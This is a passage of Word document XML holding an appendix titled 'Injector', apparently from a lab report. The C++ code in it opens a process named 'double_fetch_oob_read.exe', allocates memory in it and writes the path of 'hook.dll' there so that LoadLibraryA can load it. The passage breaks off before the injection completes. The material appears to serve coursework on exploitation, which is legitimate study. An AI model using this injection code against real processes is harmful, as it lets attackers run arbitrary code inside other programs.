    <w:p w14:paraId="3A3016E8" w14:textId="77777777" w:rsidR="00C36C17" w:rsidRDefault="00C36C17" w:rsidP="00C36C17">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE98E1" w14:textId="3F52B969" w:rsidR="007954D1" w:rsidRPr="005F0474" w:rsidRDefault="007954D1" w:rsidP="007954D1">
      <w:pPr>
        <w:pStyle w:val="afff1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0474">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639FC789" w14:textId="4DA6693F" w:rsidR="007954D1" w:rsidRPr="007954D1" w:rsidRDefault="007954D1" w:rsidP="007954D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BDC5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#define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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WIN32_LEAN_AND_MEAN</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E010C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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEF835F"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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;iostream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FA363"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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7BD892"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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"time.h"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79301714"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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;tlhelp32.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F24364"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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;comdef.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D10272D"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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;vector&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBA6A4"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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;tchar.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF4AB62"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#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;shlobj_core.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415FA538"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D522E49"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#define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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NAME_OF_PROCESS</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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"double_fetch_oob_read.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C6714D"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using</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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> std;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF55516"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DCE1D16"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> LoadLib(</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessId</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273EA4A5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F04A4"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CurDir[</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAX_PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>] = { 0 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1D1FB"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801722F"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HMODULE</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> KernelModule;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A865369"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HANDLE</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TID;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3AB0EC"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPVOID</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2160B"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPVOID</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ArgLoadLibrary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11346257"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int</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NumberWrittenSymbols;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AD5BE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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HANDLE</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hProcess = OpenProcess(</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROCESS_ALL_ACCESS</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FALSE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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessId</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA8A07"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GetCurrentDirectoryA(</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(CurDir), CurDir);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DE65E"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>size_t</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> len = </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(CurDir);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFB63FC"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 xml:space="preserve">strcat_s(CurDir, </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"\\hook.dll"</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A37B175"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const</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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>* DllName = CurDir;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759FB988"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B9D830E"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hProcess ==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34B97240"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4960C3A3"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 xml:space="preserve">cout &lt;&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Error, OpenProcess: "</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; GetLastError() &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E1B82"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B21529"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0FE26B96"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C461AFA"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KernelModule = GetModuleHandleW(</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"kernel32.dll"</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885DF95"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2DF2D39"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (KernelModule ==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36D6B23C"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6580690F"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 xml:space="preserve">cout &lt;&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Error, GetModuleHandleW: "</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; GetLastError() &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B464F"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D500B9"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A895946"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0232C8BF"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14BF3AB"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = GetProcAddress(KernelModule, </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"LoadLibraryA"</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CFCE6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42D0EF9"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if</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ==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4FA40E9E"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63D1AB06"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 xml:space="preserve">cout &lt;&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Error,GetProcAddress : "</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; GetLastError() &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AE708"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A9E26A7"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D9B2D"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676E444"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0A1FD328"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1F45FD4"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ArgLoadLibrary = (</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPVOID</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)VirtualAllocEx(hProcess,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 xml:space="preserve">, strlen(DllName) + 1, </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MEM_RESERVE</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MEM_COMMIT</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PAGE_READWRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D07A2"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9EA8D7F"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ArgLoadLibrary ==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66432218"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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387FCE35"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 xml:space="preserve">cout &lt;&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Error,VirtualAllocEx : "</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; GetLastError() &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1698C7"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FEFD5BE"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE7D6DA"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2A5AB5"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16E6D914"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122898A"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 xml:space="preserve">NumberWrittenSymbols = WriteProcessMemory(hProcess, ArgLoadLibrary, DllName, strlen(DllName) + 1,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15035298"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B84546E"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
